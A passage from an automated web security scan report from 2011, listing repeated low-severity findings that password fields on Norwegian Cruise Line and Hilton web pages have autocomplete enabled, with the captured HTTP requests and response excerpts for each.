<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>
<title>Gourmet Chef
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...
13.16. https://www.ncl.com/nclweb/secure/bookedGuestLanding.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ncl.com
Path:   /nclweb/secure/bookedGuestLanding.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /nclweb/secure/bookedGuestLanding.html HTTP/1.1
Host: www.ncl.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/cruise-destinations
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.7.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646302860-Repeat%7C1320238302860%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fsecure%2525252FbookedGuestLanding.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 55571
Date: Mon, 03 Oct 2011 12:51:26 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


My NCL</
...[SNIP]...
<div id="login_form_container">
                   <form name="loginDynaForm" method="post" action="/nclweb/secure/loginBookedGuest.html" class="pad-left-1" id="accountLogin">
                       <div class="input_container">
...[SNIP]...
</label>
                        <input type="password" name="loginVO.password" value="" id="password" class="textbox" title="Password">
                       </div>
...[SNIP]...
13.17. https://www.ncl.com/nclweb/secure/loginBookedGuest.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ncl.com
Path:   /nclweb/secure/loginBookedGuest.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /nclweb/secure/loginBookedGuest.html HTTP/1.1
Host: www.ncl.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.ncl.com/nclweb/secure/bookedGuestLanding.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.7.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646302860-Repeat%7C1320238302860%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fsecure%2525252FbookedGuestLanding.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 55571
Date: Mon, 03 Oct 2011 12:51:49 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


My NCL</
...[SNIP]...
<div id="login_form_container">
                   <form name="loginDynaForm" method="post" action="/nclweb/secure/loginBookedGuest.html" class="pad-left-1" id="accountLogin">
                       <div class="input_container">
...[SNIP]...
</label>
                        <input type="password" name="loginVO.password" value="" id="password" class="textbox" title="Password">
                       </div>
...[SNIP]...
13.18. http://www1.hilton.com/en_US/hi/customersupport/feedback.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/feedback.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/customersupport/feedback.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; NSC_qse-qgt=44153d5f3660; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637043717:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:17:04 GMT
Content-Length: 36138
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:28:04 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.19. http://www1.hilton.com/en_US/hi/customersupport/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/customersupport/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:00 GMT;path=/
Content-Length: 35005


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.20. http://www1.hilton.com/en_US/hi/customersupport/local-reservations.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/local-reservations.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/customersupport/local-reservations.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637060085:ss=1317635584777; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:17:38 GMT
Content-Length: 76665
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:28:38 GMT;path=/


                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.21. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/site-usage.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/customersupport/site-usage.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; NSC_qse-qgt=44153d5f3660; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635903346:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 69511
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:07 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:09:07 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.22. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:07 GMT;path=/
Content-Length: 55346


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.23. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 49011


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.24. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:24 GMT;path=/
Content-Length: 65409


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.25. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 84893


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.26. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 47470


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.27. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:13 GMT;path=/
Content-Length: 45350


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.28. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 12:53:40 GMT
Content-Length: 84951
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:04:40 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
13.29. http://www1.hilton.com/en_US/hi/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/index.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 57662
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:41 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<div id="myreservations" style="display:none;">
           
           
                                                                           <form name="myForm" id="myForm" method="post">
               <div class="containReservationsOptions">
...[SNIP]...
</label><input id="Password_myRes" tabindex="9" name="password" class="frmTextMed" type="password">
                       </fieldset>
...[SNIP]...
13.30. http://www1.hilton.com/en_US/hi/index.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en_US/hi/index.do?WT.mc_id=zWHDD0US1HH2OLG4IEPin7BR840644 HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:03:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:14:13 GMT;path=/
Content-Length: 57658


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
